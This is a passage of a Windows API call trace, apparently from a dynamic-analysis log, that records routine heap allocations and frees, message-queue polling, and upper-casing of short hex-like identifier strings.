RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0154.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0154.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0154.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0154.620] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0154.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0154.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0154.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0154.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0154.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0154.622] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0154.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0154.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0154.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0154.623] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0154.623] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0154.623] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0154.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0154.623] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0154.624] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0154.624] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0154.624] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab28 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0154.624] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0154.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0154.624] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0154.625] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0154.625] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0154.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0154.626] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0154.626] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0154.626] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa870 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ed8 [0154.626] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0154.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0154.626] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0154.627] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0154.627] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.627] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ed8 | out: hHeap=0x2af0000) returned 1 [0154.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.627] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0154.628] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0154.628] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0154.628] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0154.628] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0154.628] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0154.628] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0154.628] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0154.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.629] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0154.629] 